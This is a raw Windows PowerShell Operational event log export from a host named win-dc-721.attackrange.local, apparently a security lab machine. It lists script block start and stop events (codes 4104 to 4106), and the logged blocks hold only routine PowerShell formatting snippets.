Message=Started invocation of ScriptBlock ID: 18ebddec-0fe6-48a4-b9f0-8a4bb38ec99e
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476518
Keywords=None
Message=Completed invocation of ScriptBlock ID: ff13d9b4-0d67-4bf4-b4b8-ae1d134fe942
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476517
Keywords=None
Message=Started invocation of ScriptBlock ID: ff13d9b4-0d67-4bf4-b4b8-ae1d134fe942
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476516
Keywords=None
Message=Completed invocation of ScriptBlock ID: 18ebddec-0fe6-48a4-b9f0-8a4bb38ec99e
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476515
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9c6c5db8-4434-4099-96b7-7eff0b918e23
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476514
Keywords=None
Message=Started invocation of ScriptBlock ID: 9c6c5db8-4434-4099-96b7-7eff0b918e23
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1476513
Keywords=None
Message=Creating Scriptblock text (1 of 1):
{ Set-StrictMode -Version 1; $_.OriginInfo }

ScriptBlock ID: 9c6c5db8-4434-4099-96b7-7eff0b918e23
Path:
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476512
Keywords=None
Message=Completed invocation of ScriptBlock ID: d6c475cb-a102-49f4-9ba8-6dad019309a5
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476511
Keywords=None
Message=Started invocation of ScriptBlock ID: d6c475cb-a102-49f4-9ba8-6dad019309a5
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1476510
Keywords=None
Message=Creating Scriptblock text (1 of 1):
{ Set-StrictMode -Version 1; $_.ErrorCategory_Message }

ScriptBlock ID: d6c475cb-a102-49f4-9ba8-6dad019309a5
Path:
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476509
Keywords=None
Message=Completed invocation of ScriptBlock ID: 673f814b-b345-4289-bb3f-c47b813ab2b3
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476508
Keywords=None
Message=Completed invocation of ScriptBlock ID: 3a4f0322-8a1f-4935-b75b-7b1360c19530
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476507
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9eb59db5-ed3e-41d3-9d04-6a88e40f3e61
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476506
Keywords=None
Message=Started invocation of ScriptBlock ID: 9eb59db5-ed3e-41d3-9d04-6a88e40f3e61
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1476505
Keywords=None
Message=Creating Scriptblock text (1 of 1):
{ Set-StrictMode -Version 1; $this.Exception.InnerException.PSMessageDetails }

ScriptBlock ID: 9eb59db5-ed3e-41d3-9d04-6a88e40f3e61
Path:
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476504
Keywords=None
Message=Started invocation of ScriptBlock ID: 3a4f0322-8a1f-4935-b75b-7b1360c19530
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476503
Keywords=None
Message=Started invocation of ScriptBlock ID: 673f814b-b345-4289-bb3f-c47b813ab2b3
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1476502
Keywords=None
Message=Creating Scriptblock text (1 of 1):
{ Set-StrictMode -Version 1; $_.PSMessageDetails }

ScriptBlock ID: 673f814b-b345-4289-bb3f-c47b813ab2b3
Path:
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476501
Keywords=None
Message=Started invocation of ScriptBlock ID: 18ebddec-0fe6-48a4-b9f0-8a4bb38ec99e
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476500
Keywords=None
Message=Completed invocation of ScriptBlock ID: ff13d9b4-0d67-4bf4-b4b8-ae1d134fe942
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476499
Keywords=None
Message=Started invocation of ScriptBlock ID: ff13d9b4-0d67-4bf4-b4b8-ae1d134fe942
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476498
Keywords=None
Message=Completed invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476497
Keywords=None
Message=Started invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476496
Keywords=None
Message=Completed invocation of ScriptBlock ID: 32d46f36-be94-4f0d-abe1-0c2f6b2cdf81
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476495
Keywords=None
Message=Started invocation of ScriptBlock ID: 32d46f36-be94-4f0d-abe1-0c2f6b2cdf81
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476494
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1ef9c228-b78e-4897-b91e-9c995c7fd3bc
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476493
Keywords=None
Message=Completed invocation of ScriptBlock ID: 0ff69ef5-ab05-4a0c-a15a-b14020b973f4
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476492
Keywords=None
Message=Started invocation of ScriptBlock ID: 0ff69ef5-ab05-4a0c-a15a-b14020b973f4
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1476491
Keywords=None
Message=Creating Scriptblock text (1 of 1):
$global:?

ScriptBlock ID: 0ff69ef5-ab05-4a0c-a15a-b14020b973f4
Path:
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476490
Keywords=None
Message=Completed invocation of ScriptBlock ID: 23a330c5-a581-49a7-8eb4-594464f9ede6
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476489
Keywords=None
Message=Completed invocation of ScriptBlock ID: 275f759f-9a7b-4e35-a8de-e1f664abea86
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476488
Keywords=None
Message=Completed invocation of ScriptBlock ID: 08c631bd-97a5-450c-a69c-c117724f842e
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476487
Keywords=None
Message=Completed invocation of ScriptBlock ID: 4ab062d8-9914-459f-a32b-b9c82cabf003
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476486
Keywords=None
Message=Started invocation of ScriptBlock ID: 4ab062d8-9914-459f-a32b-b9c82cabf003
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476485
Keywords=None
Message=Completed invocation of ScriptBlock ID: 8c1b3574-af56-422b-8083-143d1fa9eec7
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476484
Keywords=None
Message=Started invocation of ScriptBlock ID: 8c1b3574-af56-422b-8083-143d1fa9eec7
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476483
Keywords=None
Message=Completed invocation of ScriptBlock ID: 75a4c1da-ffed-42dd-8e58-2ef5e45103b6
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476482
Keywords=None
Message=Completed invocation of ScriptBlock ID: 5a7e1786-6735-4628-8b01-3f292a0d253e
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476481
Keywords=None
Message=Completed invocation of ScriptBlock ID: 2b1c0594-18f1-414d-9b57-a1c4696f0102
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476480
Keywords=None
Message=Started invocation of ScriptBlock ID: 2b1c0594-18f1-414d-9b57-a1c4696f0102
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476479
Keywords=None
Message=Started invocation of ScriptBlock ID: 5a7e1786-6735-4628-8b01-3f292a0d253e
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476478
Keywords=None
Message=Started invocation of ScriptBlock ID: 75a4c1da-ffed-42dd-8e58-2ef5e45103b6
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476477
Keywords=None
Message=Started invocation of ScriptBlock ID: 08c631bd-97a5-450c-a69c-c117724f842e
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476476
Keywords=None
Message=Completed invocation of ScriptBlock ID: 419a5b90-111c-45f9-b926-00f38a8055bb
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476475
Keywords=None
Message=Started invocation of ScriptBlock ID: 419a5b90-111c-45f9-b926-00f38a8055bb
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476474
Keywords=None
Message=Completed invocation of ScriptBlock ID: 08c631bd-97a5-450c-a69c-c117724f842e
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476473
Keywords=None
Message=Completed invocation of ScriptBlock ID: 4ab062d8-9914-459f-a32b-b9c82cabf003
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476472
Keywords=None
Message=Started invocation of ScriptBlock ID: 4ab062d8-9914-459f-a32b-b9c82cabf003
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1476471
Keywords=None
Message=Creating Scriptblock text (1 of 1):
{ Set-StrictMode -Version 1; $_.OriginInfo }

ScriptBlock ID: 4ab062d8-9914-459f-a32b-b9c82cabf003
Path:
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476470
Keywords=None
Message=Completed invocation of ScriptBlock ID: 8c1b3574-af56-422b-8083-143d1fa9eec7
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476469
Keywords=None
Message=Started invocation of ScriptBlock ID: 8c1b3574-af56-422b-8083-143d1fa9eec7
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1476468
Keywords=None
Message=Creating Scriptblock text (1 of 1):
{ Set-StrictMode -Version 1; $_.ErrorCategory_Message }

ScriptBlock ID: 8c1b3574-af56-422b-8083-143d1fa9eec7
Path:
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476467
Keywords=None
Message=Completed invocation of ScriptBlock ID: 75a4c1da-ffed-42dd-8e58-2ef5e45103b6
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476466
Keywords=None
Message=Completed invocation of ScriptBlock ID: 5a7e1786-6735-4628-8b01-3f292a0d253e
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:35 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476465
Keywords=None
Message=Completed invocation of ScriptBlock ID: 2b1c0594-18f1-414d-9b57-a1c4696f0102
